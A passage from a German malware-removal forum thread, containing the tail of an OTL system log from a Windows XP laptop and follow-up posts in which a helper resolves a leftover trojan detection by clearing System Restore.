Einstellungen\***\Anwendungsdaten\Intel [2009.12.26 01:21:14 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\LizardTech [2008.08.27 17:56:20 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Macromedia [2010.06.20 21:01:28 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Malwarebytes [2010.03.16 16:08:39 | 000,000,000 | --SD | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Microsoft [2010.01.31 18:38:38 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla [2009.01.15 20:00:08 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\NewsLeecher [2008.08.28 04:33:46 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Opera [2008.10.09 01:06:36 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\SteelBytes [2008.09.09 21:24:44 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Sun [2008.11.10 02:04:51 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\WinMount [2008.09.10 13:26:29 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\WinRAR [2010.04.10 19:37:18 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\XnView [2010.01.31 18:40:52 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Yandex [2010.02.10 05:34:20 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Zoner < %APPDATA%\*.exe /s > [2010.01.10 08:08:58 | 004,080,905 | ---- | M] (Phil Harvey) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\GeoSetter\tools\exiftool.exe [2010.06.18 13:17:31 | 000,388,096 | R--- | M] (Trend Micro Inc.) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe [2008.09.21 20:59:43 | 000,022,486 | R--- | M] () -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Microsoft\Installer\{80540DA3-E60A-4F80-A719-E327B01F8A0F}\_B5D1645CC40FE72E4048EC.exe < %SYSTEMDRIVE%\*.exe > [2010.06.20 20:44:55 | 000,077,312 | ---- | M] () -- C:\mbr.exe < MD5 for: AGP440.SYS > [2008.06.18 10:40:37 | 018,922,364 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:AGP440.sys [2008.04.13 19:36:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ERDNT\cache\AGP440.SYS [2008.04.13 19:36:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\AGP440.SYS < MD5 for: ATAPI.SYS > [2008.06.18 10:40:37 | 018,922,364 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys [2008.04.14 00:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ERDNT\cache\atapi.sys [2008.04.14 00:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys < MD5 for: EVENTLOG.DLL > [2008.04.14 07:52:12 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=04955AA695448C181B367D964AF158AA -- C:\WINDOWS\ERDNT\cache\eventlog.dll [2008.04.14 07:52:12 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=04955AA695448C181B367D964AF158AA -- C:\WINDOWS\system32\eventlog.dll < MD5 for: NETLOGON.DLL > [2008.06.18 10:35:51 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=B4D6D344EACDA356D4AAAC7757955F0C -- C:\WINDOWS\ERDNT\cache\netlogon.dll [2008.06.18 10:35:51 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=B4D6D344EACDA356D4AAAC7757955F0C -- C:\WINDOWS\system32\netlogon.dll < MD5 for: SCECLI.DLL > [2008.04.14 07:52:24 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=5132443DF6FC3771A17AB4AE55DCBC28 -- C:\WINDOWS\ERDNT\cache\scecli.dll [2008.04.14 07:52:24 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=5132443DF6FC3771A17AB4AE55DCBC28 -- C:\WINDOWS\system32\scecli.dll < MD5 for: USERINIT.EXE > [2008.04.14 07:53:04 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=788F95312E26389D596C0FA55834E106 -- C:\WINDOWS\ERDNT\cache\userinit.exe [2008.04.14 07:53:04 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=788F95312E26389D596C0FA55834E106 -- C:\WINDOWS\system32\userinit.exe < MD5 for: WS2IFSL.SYS > [2007.10.29 14:00:00 | 000,012,032 | ---- | M] (Microsoft Corporation) MD5=6ABE6E225ADB5A751622A9CC3BC19CE8 -- C:\WINDOWS\system32\drivers\ws2ifsl.sys < %systemroot%\system32\drivers\*.sys /lockedfiles > < %systemroot%\System32\config\*.sav > [2010.06.08 16:15:15 | 000,421,888 | ---- | M] () -- C:\WINDOWS\system32\config\default.sav [2010.06.08 14:16:32 | 000,262,144 | ---- | M] () -- C:\WINDOWS\system32\config\security.sav [2010.06.08 18:35:57 | 023,330,816 | ---- | M] () -- C:\WINDOWS\system32\config\software.sav [2010.06.08 18:35:57 | 005,505,024 | ---- | M] () -- C:\WINDOWS\system32\config\system.sav < %systemroot%\*. /mp /s > < %systemroot%\system32\*.dll /lockedfiles > [2010.05.04 18:48:26 | 000,347,136 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\dxtmsft.dll [2010.05.04 18:48:26 | 000,214,528 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\dxtrans.dll [3 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ] ========== Alternate Data Streams ========== @Alternate Data Stream - 147 bytes -> C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP:5F64C164 @Alternate Data Stream - 114 bytes -> C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP:806222FC @Alternate Data Stream - 106 bytes -> C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP:592EFD93 < End of report > Extras.txt Code:
ATTFilter OTL Extras logfile created on: 03.07.2010 17:21:09 - Run 3
OTL by OldTimer - Version 3.2.7.0 Folder = C:\Dokumente und Einstellungen\***\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
1.014,00 Mb Total Physical Memory | 656,00 Mb Available Physical Memory | 65,00% Memory free
2,00 Gb Paging File | 2,00 Gb Available in Paging File | 87,00% Paging File free
Paging file location(s): c:\pagefile.sys 1524 3048 [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Programme
Drive C: | 64,00 Gb Total Space | 29,99 Gb Free Space | 46,85% Space Free | Partition Type: NTFS
Drive D: | 85,02 Gb Total Space | 54,79 Gb Free Space | 64,44% Space Free | Partition Type: FAT32
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded
Computer Name: TOUGHBOOK
Current User Name: ***
Logged in as Administrator.
Current Boot Mode: Normal
Scan Mode: All users
Company Name Whitelist: Off
Skip Microsoft Files: Off
File Age = 60 Days
Output = Minimal
========== Extra Registry (SafeList) ==========
========== File Associations ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html [@ = Opera.HTML] -- C:\Programme\Opera\opera.exe (Opera Software)
========== Shell Spawning ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
htmlfile [edit] -- Reg Error: Key error.
http [open] -- "C:\Programme\Opera\opera.exe" "%1" (Opera Software)
https [open] -- "C:\Programme\Opera\opera.exe" (Opera Software)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l (Microsoft Corporation)
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Betrachten mit XnView] -- "C:\Programme\XnView\xnview.exe" "%1" (XnView, hxxp://www.xnview.com)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
========== Security Center Settings ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled" = 1
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
"FirewallOverride" = 0
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
========== Authorized Applications List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Programme\Java\jre1.6.0_06\bin\java.exe" = C:\Programme\Java\jre1.6.0_06\bin\java.exe:*:Enabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Programme\eMule0.49b\emule.exe" = C:\Programme\eMule0.49b\emule.exe:*:Enabled:eMule -- (hxxp://www.emule-project.net)
"C:\Programme\Opera\opera.exe" = C:\Programme\Opera\opera.exe:*:Enabled:Opera Internet Browser -- (Opera Software)
"C:\Programme\Java\jre1.6.0_06\launch4j-tmp\JDownloader.exe" = C:\Programme\Java\jre1.6.0_06\launch4j-tmp\JDownloader.exe:*:Disabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\WINDOWS\system32\java.exe" = C:\WINDOWS\system32\java.exe:*:Disabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Programme\WinSCP\WinSCP.exe" = C:\Programme\WinSCP\WinSCP.exe:*:Enabled:WinSCP: SFTP, FTP and SCP client -- (Martin Prikryl)
========== HKEY_LOCAL_MACHINE Uninstall List ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
"{0DEE890C-BC1C-49DC-BF41-33DC26D41031}" = Nero 7 Essentials
"{0E2B0B41-7E08-4F9F-B21F-41C4133F43B7}" = mLogView
"{110EB5C4-E995-4CFB-AB80-A5F315BEA9E8}" = Python 2.6
"{1D2C96C3-A3F3-49E7-B839-95279DED837F}" = Opera 10.60
"{211E8730-5681-49ED-BC6A-78C9F88E95F5}" = Adobe Shockwave Player
"{23FB368F-1399-4EAC-817C-4B83ECBE3D83}" = mProSafe
"{30348D0E-37F0-41EE-869B-F0441A87FFEC}" = PC Information Viewer
"{3248F0A8-6813-11D6-A77B-00B0D0160060}" = Java(TM) 6 Update 6
"{350C97B3-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3E9D596A-61D4-4239-BD19-2DB984D2A16F}" = mIWA
"{406ECB40-9B45-459D-9E97-ADFEA4610FBA}" = Panasonic Misc Driver
"{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis
"{5639BE8E-33DA-402A-B414-1FBED9CC50E1}" = DMI Viewer
"{56C049BE-79E9-4502-BEA7-9754A3E60F9B}" = neroxml
"{59046D29-2E6B-4224-BF0D-64F3E7A93F7B}" = LightScribe System Software 1.10.19.1
"{5E08B15D-7C97-4FC9-8500-BD7EDA18C66A}" = MICRODEM Freeware GIS
"{6DAA0AF0-3B51-4EE0-83CC-47A3582DFA51}" = Loupe Utility
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{80540DA3-E60A-4F80-A719-E327B01F8A0F}" = Kali map2cal Converter
"{880A90B0-3783-4D92-A0A3-080B00BC8B24}" = Memory-Map OS Edition Version 5
"{8A708DD8-A5E6-11D4-A706-000629E95E20}" = Intel(R) Extreme Graphics 2 Driver
"{8B928BA1-EDEC-4227-A2DA-DD83026C36F5}" = mPfMgr
"{8C6BB412-D3A8-4AAE-A01B-35B681789D68}" = mHelp
"{90B0D222-8C21-4B35-9262-53B042F18AF9}" = mPfWiz
"{917F080C-F7A3-41CE-AF03-40163647851C}" = ESET NOD32 Antivirus
"{9309DD7E-EBFE-3C95-8B47-30D3A012F606}" = Microsoft .NET Framework 2.0 Service Pack 1 Language Pack - DEU
"{93994589-6A13-49BE-8AF6-12AAC9A28529}" = Icon Enlarger
"{943622A3-F5E9-464F-A025-90D02F3B8ACE}" = Hotkey Appendix
"{94658027-9F16-4509-BBD7-A59FE57C3023}" = mZConfig
"{993A94A9-DCE3-4774-B35D-D8C74FC1E0BE}" = Royale Remixed Theme
"{99733131-7B00-4E5C-8991-113CD61D8E2F}" = Panasonic Common Components
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9E9CAC61-DB2E-11DE-BE15-005056C00008}" = Paragon Backup and Recovery™ 10 Compact Edition
"{A05CF147-BEED-4880-BF9B-4EAF22C77FFD}" = Microsoft Pro Photo Tools
"{A0F925BF-5C55-44C2-A4E7-5A4C59791C29}" = mDriver
"{A1071AEB-B0EF-3F5F-BC84-83A270EBE496}" = Microsoft .NET Framework 3.0 Service Pack 1 Language Pack - DEU
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1031-7B44-A93000000001}" = Adobe Reader 9.3.2 - Deutsch
"{AD044254-C8D2-4866-9449-890EF278617B}" = CPU Idle Setting
"{AEB9948B-4FF2-47C9-990E-47014492A0FE}" = MSXML 6.0 Parser
"{C084BC61-E537-11DE-8616-005056806466}" = Google Earth
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CD5C2205-7BAD-4B87-BF9A-2BAC626B29C8}" = Battery Recalibration
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{DEEFA812-64A6-4083-BB38-87F68B6BA820}" = Hotkey Settings
"{E78BFA60-5393-4C38-82AB-E8019E464EB4}" = Microsoft .NET Framework 1.1 German Language Pack
"{E81667C6-2856-46D6-ABEA-6A2F42166779}" = mCore
"{F0BFC7EF-9CF8-44EE-91B0-158884CD87C5}" = mMHouse
"{F2A58903-E54D-4F8D-AC1D-55DEAF64A7E2}" = Global Mapper 11
"{F6090A17-0967-4A8A-B3C3-422A1B514D49}" = mDrWiFi
"{FCA651F3-5BDA-4DDA-9E4A-5D87D6914CC4}" = mWlsSafe
"{FD95D9B1-CD01-4240-BE5F-A2CA21B553BC}" = Wireless Switch Utility
"7-Zip" = 7-Zip 4.60 beta
"Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin
"AmoKExifSorter2" = AmoK Exif Sorter 2.5.4 (nur deinstallieren)
"BDE Information Utility" = BDE Information Utility
"cGPSmapper Free_is1" = cGPSmapper Free 0099a
"EASEUS Data Recovery Wizard 5.0.1_is1" = EASEUS Data Recovery Wizard 5.0.1
"EASEUS Partition Master Professional Edition_is1" = EASEUS Partition Master 5.5.1 Professional
"ECW ActiveX Controls" = ECW ActiveX Controls 3.1.0.229
"ECW Header Editor" = ECW Header Editor 2.52
"ER Viewer 7.3" = ERDAS ER Viewer 7.3 & Microsoft Office Plugin
"GeoTiffExaime" = GeoTiffExaime
"GPS-Track-Analyse.NET_is1" = 5.0.1
"hp deskjet 930c series_Driver" = hp deskjet 930c series
"ImgBurn" = ImgBurn
"Installing HSP56 MicroModem Drivers" = Panasonic V.92 MDC Modem Drivers
"InstallShield_{99733131-7B00-4E5C-8991-113CD61D8E2F}" = Panasonic Common Components
"IrfanView" = IrfanView (remove only)
"IsoBuster_is1" = IsoBuster 2.4
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
"MasterSplitter" = MasterSplitter Program
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"NewsLeecher_is1" = NewsLeecher v3.9 Final
"OziExplorer 3.95_is1" = OziExplorer 3.95
"OziMrSid Dll_is1" = OziMrSid Dll Version 3.00
"PanasonicHotkeyDriver" = Hotkey Driver for Panasonic PC
"PhotoME_is1" = PhotoME
"ProInst" = Intel(R) PROSet/Wireless Software
"QuickPar" = QuickPar 0.9
"rarslave_is1" = rarslave 0.1.9 build 11 BETA
"Runtimes" = Allgemeine Runtime Dateien
"Sandboxie" = Sandboxie 3.442
"Secunia PSI" = Secunia PSI
"Snapshot" = Snapshot (remove only)
"Sophos-AntiRootkit" = Sophos Anti-Rootkit 1.5.0
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"Touratech QV 4_is1" = Touratech QV 4
"ttkCAL_is1" = TatukGIS Calculator 2.0.4.176
"ttkVWR_is1" = TatukGIS Viewer 1.13.1.370
"VirtualCloneDrive" = VirtualCloneDrive
"WinDjView" = WinDjView 1.0.3
"WinHTTrack Website Copier_is1" = WinHTTrack Website Copier 3.43-9C
"WinMount3_is1" = WinMount V3.1.0 Beta 0925
"WinRAR archiver" = WinRAR
"winscp3_is1" = WinSCP 4.2.5
"WMV9APDMOE" = Windows Media Video 9 Advanced Profile Codec
"XnView_is1" = XnView 1.96.5
"XpsEPSC" = XML Paper Specification Shared Components Pack 1.0
"XPSEPSCLP" = XML Paper Specification Shared Components Language Pack 1.0
"XPSP3UPPACK" = Sereby's XP SP3 Updatepack Version 3.8.6
"ZonerPhotoStudio12_EN_is1" = Zoner Photo Studio 12
========== HKEY_USERS Uninstall List ==========
[HKEY_USERS\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"602272bddadc0877" = LizardTech GeoViewer
"T4A Maps Ethiopia/Sudan/Egypt/Somalia 8,10 (Routable)" = T4A Maps Ethiopia/Sudan/Egypt/Somalia 8,10 (Routable)
========== Last 10 Event Log Errors ==========
[ Application Events ]
Error - 21.05.2010 18:47:13 | Computer Name = TOUGHBOOK | Source = Application Error | ID = 1000
Description = Fehlgeschlagene Anwendung i_view32.exe, Version 4.2.5.0, fehlgeschlagenes
Modul ntdll.dll, Version 5.1.2600.5755, Fehleradresse 0x0000100b.
Error - 08.06.2010 11:08:39 | Computer Name = TOUGHBOOK | Source = Windows Product Activation | ID = 1012
Description = Aufgrund von Hardwareänderungen auf diesem Computer, müssen Sie Windows
erneut aktivieren.
Error - 08.06.2010 12:37:57 | Computer Name = TOUGHBOOK | Source = Windows Product Activation | ID = 1009
Description = Sie haben dieses Produkt nicht fristgerecht aktiviert. Wenden Sie
sich telefonisch an den Kundendienst, um Windows zu aktivieren.
Error - 15.06.2010 15:55:40 | Computer Name = TOUGHBOOK | Source = Application Hang | ID = 1002
Description = Stillstehende Anwendung opera.exe, Version 9.52.10108.0, Stillstandmodul
hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.
Error - 18.06.2010 05:40:17 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609
Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während
der internen Verarbeitung erkannt. HRESULT war 800706BF von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp.
Wenden Sie sich an den Microsoft-Produktsuppor
Error - 18.06.2010 09:44:35 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609
Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während
der internen Verarbeitung erkannt. HRESULT war 800706BA von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp.
Wenden Sie sich an den Microsoft-Produktsuppor
Error - 19.06.2010 11:40:52 | Computer Name = TOUGHBOOK | Source = Application Hang | ID = 1002
Description = Stillstehende Anwendung opera.exe, Version 9.52.10108.0, Stillstandmodul
hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.
Error - 20.06.2010 13:57:31 | Computer Name = TOUGHBOOK | Source = Application Error | ID = 1000
Description = Fehlgeschlagene Anwendung opera.exe, Version 9.52.10108.0, fehlgeschlagenes
Modul unknown, Version 0.0.0.0, Fehleradresse 0x100019e1.
Error - 21.06.2010 06:18:17 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609
Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während
der internen Verarbeitung erkannt. HRESULT war 800706BA von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp.
Wenden Sie sich an den Microsoft-Produktsuppor
Error - 21.06.2010 06:43:22 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609
Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während
der internen Verarbeitung erkannt. HRESULT war 800706BF von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp.
Wenden Sie sich an den Microsoft-Produktsuppor
[ System Events ]
Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034
Description = Dienst "Intel(R) PROSet/Wireless Event Log" wurde unerwartet beendet.
Dies ist bereits 1 Mal passiert.
Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034
Description = Dienst "LightScribeService Direct Disc Labeling Service" wurde unerwartet
beendet. Dies ist bereits 1 Mal passiert.
Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034
Description = Dienst "Intel(R) PROSet/Wireless Registry Service" wurde unerwartet
beendet. Dies ist bereits 1 Mal passiert.
Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034
Description = Dienst "Sandboxie Service" wurde unerwartet beendet. Dies ist bereits
1 Mal passiert.
Error - 20.06.2010 18:48:14 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034
Description = Dienst "InCD Helper" wurde unerwartet beendet. Dies ist bereits 1
Mal passiert.
Error - 21.06.2010 06:17:16 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7031
Description = Der Dienst "Remoteprozeduraufruf (RPC)" wurde unerwartet beendet.
Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000
Millisekunden durchgeführt: Starten Sie den Computer neu..
Error - 21.06.2010 06:42:16 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7031
Description = Der Dienst "Remoteprozeduraufruf (RPC)" wurde unerwartet beendet.
Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000
Millisekunden durchgeführt: Starten Sie den Computer neu..
Error - 28.06.2010 16:51:53 | Computer Name = TOUGHBOOK | Source = sr | ID = 1
Description = Beim Verarbeiten der Datei "A0001235.SRC" auf Volume "HarddiskVolume4"
ist im Wiederherstellungsfilter der unerwartete Fehler "0xC000007F" aufgetreten.
Die Volumeüberwachung wurde angehalten.
Error - 02.07.2010 06:45:52 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7038
Description = Der Dienst "SSDPSRV" konnte sich nicht als "NT AUTHORITY\LocalService"
mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: %%5 Vergewissern
Sie
sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft
Management Console (MMC).
Error - 02.07.2010 06:45:52 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7000
Description = Der Dienst "SSDP-Suchdienst" wurde aufgrund folgenden Fehlers nicht
gestartet: %%1069
< End of report >
|
|
04.07.2010, 10:22
| #8 |
| /// Malware-holic | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt besteht das problem denn noch immer? |
|
07.07.2010, 00:17
| #9 |
| | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt Hallo marcusg nein, seit dem Durchlauf mit ComboFix sind die Symptome weg. Es scheint alles in Ordnung zu sein. sejott |
|
07.07.2010, 12:04
| #10 |
| /// Malware-holic | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt was sagt ein eset system scan? nach update natürlich. |
|
07.07.2010, 23:08
| #11 |
| | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt es gibt noch eine Meldung von NOD32: Code:
ATTFilter D:\System Volume Information\_restore{9CE13958-8543-4CCA-84F0-8543FE1A12FE}\RP21\A0006210.exe - möglicherweise Variante von Win32/Agent Trojaner - Gesäubert durch Löschen - in Quarantäne kopiert
|
|
08.07.2010, 12:09
| #12 |
| /// Malware-holic | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt rechtsklick arbietsplatz, eigenschaften, systemwiederherstellung auf allen laufwerken deaktiviren. übernehmen, ok 10 minuten warten und wieder einschalten. damit sollte sich das auch erledigt haben. |
|
13.07.2010, 18:56
| #13 |
| | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt Hallo markusg, hab ich gemacht und auch weiter nichts negatives festgestellt. Dann ist das damit hoffentlich erledigt. War ja weniger Aufwand als ich anfangs dachte. Vielen Dank an Dich und natürlich insbesondere an sUBs ! |
|
| Themen zu Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt |
| absturz, adobe, antivirus, askbar, aufrufe, avira, bho, bluescree, browser, browseui preloader, computer, dateien gelöscht, einstellungen, eset nod32, explorer, forbidden, google, hkus\s-1-5-18, homepage, internet, internet explorer, malwarebytes' anti-malware, microsoft, ntdll.dll, opera, problem, programme, registry, rundll, scan, sekunden, software, sophos anti-rootkit, systemreparatur, temp, win32k.sys, windows, windows xp |
Linear-Darstellung
